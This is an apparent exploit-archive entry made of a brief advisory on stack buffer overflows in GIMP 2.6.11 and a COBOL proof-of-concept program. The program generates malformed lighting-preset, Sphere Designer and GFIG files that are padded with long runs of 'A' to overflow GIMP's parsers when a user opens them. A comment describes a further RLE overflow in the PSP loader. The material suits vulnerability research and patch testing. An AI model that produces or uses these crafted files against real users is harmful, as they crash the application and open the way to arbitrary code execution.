source: https://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150* FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName: Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity: 100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern: Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient: FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650 OPEN OUTPUT FILE01.
000660 WRITE PRINTLINE FROM TEXT-OUT1.
000670 WRITE PRINTLINE FROM TEXT-OUT2.
000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730 WRITE PRINTLINE FROM TEXT-OUT5.
000740 WRITE PRINTLINE FROM TEXT-OUT6.
000750 WRITE PRINTLINE FROM TEXT-OUT7.
000760 WRITE PRINTLINE FROM TEXT-OUT8.
000770 CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800 OPEN OUTPUT FILE02.
000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140 WRITE QRINTLINE FROM TEXU-OUT3.
001150 CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180 OPEN OUTPUT FILE03.
001190 WRITE RRINTLINE FROM TEXV-OUT1.
001200 WRITE RRINTLINE FROM TEXV-OUT2.
001210 WRITE RRINTLINE FROM TEXV-OUT3.
001220 WRITE RRINTLINE FROM TEXV-OUT4.
001230 WRITE RRINTLINE FROM TEXV-OUT5.
001240 WRITE RRINTLINE FROM TEXV-OUT6.
001250 WRITE RRINTLINE FROM TEXV-OUT7.
001260 WRITE RRINTLINE FROM TEXV-OUT8.
001270 WRITE RRINTLINE FROM TEXV-OUT9.
001280 WRITE RRINTLINE FROM TEXV-OUTA.
001290 WRITE RRINTLINE FROM TEXV-OUTB.
001300 WRITE RRINTLINE FROM TEXV-OUTC.
001310 WRITE RRINTLINE FROM TEXV-OUTD.
001320 WRITE RRINTLINE FROM TEXV-OUTE.
001330 WRITE RRINTLINE FROM TEXV-OUTF.
001340 WRITE RRINTLINE FROM TEXV-OUTG.
001350 WRITE RRINTLINE FROM TEXV-OUTH.
001360 WRITE RRINTLINE FROM TEXV-OUTI.
001370 WRITE RRINTLINE FROM TEXV-OUTJ.
001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420 WRITE RRINTLINE FROM TEXV-OUTL.
001430 WRITE RRINTLINE FROM TEXV-OUTM.
001440 WRITE RRINTLINE FROM TEXV-OUTN.
001450 CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540 STOP RUN.